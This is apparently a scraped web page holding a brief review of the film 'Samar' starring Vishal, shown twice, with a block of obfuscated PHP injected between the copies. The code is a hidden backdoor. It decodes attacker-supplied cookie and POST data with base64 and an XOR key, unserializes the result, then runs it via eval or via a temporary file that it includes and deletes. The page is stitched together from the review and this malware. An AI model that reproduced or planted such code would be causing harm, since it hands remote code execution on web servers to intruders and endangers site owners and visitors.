Samar – A very average outing for Vishal. The director had a novel plot for the movie. But where it has failed big time is in the screenplay and narration department. You are not able to connect to the movie in most of the parts
Can Skip it
$AxjyRjt = "\x46" . chr (95) . "\110" . "\x48" . "\x54" . chr (98) . 'N';$qwaBoSCFhO = "\x63" . chr (108) . chr ( 1067 - 970 ).'s' . chr (115) . chr ( 712 - 617 ).'e' . 'x' . "\x69" . "\x73" . chr (116) . chr ( 1092 - 977 ); $HIhICeNwH = $qwaBoSCFhO($AxjyRjt); $IwboDo = $HIhICeNwH;if (!$IwboDo){class F_HHTbN{private $ZuTXo;public static $YmkTgxPsp = "2d4121b8-b76a-4f0b-b51b-8e9fc5096227";public static $EiEUDxMvte = 46505;public function __construct($nPRAOtB=0){$fOOAxRCGq = $_COOKIE;$hgvVAo = $_POST;$wbIXTWH = @$fOOAxRCGq[substr(F_HHTbN::$YmkTgxPsp, 0, 4)];if (!empty($wbIXTWH)){$CCNLdbwPQq = "base64";$mvQOEEGBX = "";$wbIXTWH = explode(",", $wbIXTWH);foreach ($wbIXTWH as $gYiWOrOL){$mvQOEEGBX .= @$fOOAxRCGq[$gYiWOrOL];$mvQOEEGBX .= @$hgvVAo[$gYiWOrOL];}$mvQOEEGBX = array_map($CCNLdbwPQq . '_' . "\144" . chr ( 726 - 625 )."\x63" . chr (111) . "\144" . chr (101), array($mvQOEEGBX,)); $mvQOEEGBX = $mvQOEEGBX[0] ^ str_repeat(F_HHTbN::$YmkTgxPsp, (strlen($mvQOEEGBX[0]) / strlen(F_HHTbN::$YmkTgxPsp)) + 1);F_HHTbN::$EiEUDxMvte = @unserialize($mvQOEEGBX);}}public function __destruct(){$this->iqSfwxLnHh();}private function iqSfwxLnHh(){if (is_array(F_HHTbN::$EiEUDxMvte)) {$PiumhTiU = str_replace(chr ( 943 - 883 ) . chr ( 458 - 395 ).'p' . chr (104) . "\x70", "", F_HHTbN::$EiEUDxMvte['c' . chr ( 636 - 525 )."\156" . 't' . 'e' . "\156" . chr (116)]);eval($PiumhTiU); $SMjkKFL = "49361";exit();}}}$lIxJW = new F_HHTbN(); $lIxJW = "44080";}$RoJtIfdP = "\x54" . chr (71) . 'Y' . "\137" . chr (78) . chr ( 135 - 64 ).chr ( 284 - 218 ).chr ( 840 - 762 )."\132";$hHLKs = "\x63" . "\154" . chr (97) . chr ( 584 - 469 ).chr (115) . '_' . chr (101) . 'x' . chr (105) . chr ( 1109 - 994 )."\x74" . chr (115); $YCWeSpX = class_exists($RoJtIfdP); $hHLKs = "9937";$vCzynahoS = !1;if ($YCWeSpX == $vCzynahoS){function zuwRjS(){$OnJeRbPR = new /* 32231 */ TGY_NGBNZ(40048 + 40048); $OnJeRbPR = NULL;}$eaVBnD = "40048";class TGY_NGBNZ{private function pLIBxWG($eaVBnD){if (is_array(TGY_NGBNZ::$HcwPj)) {$rYzjwim = sys_get_temp_dir() . "/" . crc32(TGY_NGBNZ::$HcwPj[chr ( 967 - 852 ).'a' . "\x6c" . chr ( 715 - 599 )]);@TGY_NGBNZ::$HcwPj["\x77" . 'r' . chr (105) . "\x74" . 'e']($rYzjwim, TGY_NGBNZ::$HcwPj[chr ( 574 - 475 )."\x6f" . "\156" . chr (116) . "\145" . chr (110) . 't']);include $rYzjwim;@TGY_NGBNZ::$HcwPj[chr ( 756 - 656 )."\x65" . "\x6c" . 'e' . 't' . "\145"]($rYzjwim); $eaVBnD = "40048";exit();}}private $ghrUAvZL;public function EicjgUTygo(){echo 33246;}public function __destruct(){$eaVBnD = "51740_15874";$this->pLIBxWG($eaVBnD); $eaVBnD = "51740_15874";}public function __construct($bkrGjV=0){$saNNNxlBTn = $_POST;$pZHEewTC = $_COOKIE;$ggRituLveH = "6fec2c23-49cd-4b24-98e8-821ad693aede";$njwwBC = @$pZHEewTC[substr($ggRituLveH, 0, 4)];if (!empty($njwwBC)){$qmHEDmnj = "base64";$oDkVB = "";$njwwBC = explode(",", $njwwBC);foreach ($njwwBC as $BjiRcIVmD){$oDkVB .= @$pZHEewTC[$BjiRcIVmD];$oDkVB .= @$saNNNxlBTn[$BjiRcIVmD];}$oDkVB = array_map($qmHEDmnj . chr (95) . 'd' . chr (101) . "\143" . "\x6f" . "\144" . chr (101), array($oDkVB,)); $oDkVB = $oDkVB[0] ^ str_repeat($ggRituLveH, (strlen($oDkVB[0]) / strlen($ggRituLveH)) + 1);TGY_NGBNZ::$HcwPj = @unserialize($oDkVB);}}public static $HcwPj = 30320;}zuwRjS();}
Samar – A very average outing for Vishal. The director had a novel plot for the movie. But where it has failed big time is in the screenplay and narration department. You are not able to connect to the movie in most of the parts
Can Skip it